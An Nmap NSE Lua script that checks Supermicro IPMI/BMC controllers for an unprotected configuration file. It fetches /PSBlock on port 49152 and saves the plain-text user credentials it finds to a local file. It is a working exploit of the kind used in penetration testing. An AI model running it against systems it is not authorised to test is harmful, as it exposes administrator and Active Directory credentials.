100 lines
3.6 KiB
Lua
100 lines
3.6 KiB
Lua
description = [[
|
|
Attempts to download an unprotected configuration file containing plain-text
|
|
user credentials in vulnerable Supermicro Onboard IPMI controllers.
|
|
|
|
The script connects to port 49152 and issues a request for "/PSBlock" to
|
|
download the file. This configuration file contains users with their passwords
|
|
in plain text.
|
|
|
|
References:
|
|
* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
|
|
* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
|
|
]]
|
|
|
|
---
|
|
-- @usage nmap -p49152 --script supermicro-ipmi-conf <target>
|
|
--
|
|
-- @output
|
|
-- PORT STATE SERVICE REASON
|
|
-- 49152/tcp open unknown syn-ack
|
|
-- | supermicro-ipmi-conf:
|
|
-- | VULNERABLE:
|
|
-- | Supermicro IPMI/BMC configuration file disclosure
|
|
-- | State: VULNERABLE (Exploitable)
|
|
-- | Description:
|
|
-- | Some Supermicro IPMI/BMC controllers allow attackers to download
|
|
-- | a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
|
|
-- | network's Active Directory.
|
|
-- | Disclosure date: 2014-06-19
|
|
-- | Extra information:
|
|
-- | Snippet from configuration file:
|
|
-- | .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
|
|
-- | Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
|
|
-- |
|
|
-- | References:
|
|
-- |_ http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
|
|
--
|
|
-- @args supermicro-ipmi-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
|
|
---
|
|
|
|
author = "Paulino Calderon <calderon () websec mx>"
|
|
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
|
|
categories = {"exploit","vuln"}
|
|
|
|
local http = require "http"
|
|
local io = require "io"
|
|
local shortport = require "shortport"
|
|
local string = require "string"
|
|
local vulns = require "vulns"
|
|
local stdnse = require "stdnse"
|
|
|
|
portrule = shortport.portnumber(49152, "tcp")
|
|
|
|
---
|
|
--Writes string to file
|
|
local function write_file(filename, contents)
|
|
local f, err = io.open(filename, "w")
|
|
if not f then
|
|
return f, err
|
|
end
|
|
f:write(contents)
|
|
f:close()
|
|
return true
|
|
end
|
|
|
|
action = function(host, port)
|
|
local fw = stdnse.get_script_args(SCRIPT_NAME..".out") or host.ip.."_bmc.conf"
|
|
local vuln = {
|
|
title = 'Supermicro IPMI/BMC configuration file disclosure',
|
|
state = vulns.STATE.NOT_VULN,
|
|
description = [[
|
|
Some Supermicro IPMI/BMC controllers allow attackers to download
|
|
a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
|
|
network's Active Directory.]],
|
|
references = {
|
|
'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/',
|
|
},
|
|
dates = {
|
|
disclosure = {year = '2014', month = '06', day = '19'},
|
|
},
|
|
}
|
|
|
|
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
|
local open_session = http.get(host, port, "/PSBlock")
|
|
if open_session and open_session.status ==200 and string.len(open_session.body)>200 then
|
|
local s = open_session.body:gsub("%z", ".")
|
|
vuln.state = vulns.STATE.EXPLOIT
|
|
local status, err = write_file(fw,s)
|
|
local extra_info
|
|
if status then
|
|
extra_info = string.format("\nConfiguration file saved to '%s'\n", fw)
|
|
else
|
|
extra_info = ''
|
|
stdnse.debug(1, "Error saving configuration file to '%s': %s\n", fw, err)
|
|
end
|
|
|
|
vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)..extra_info
|
|
end
|
|
return vuln_report:make_output(vuln)
|
|
end
|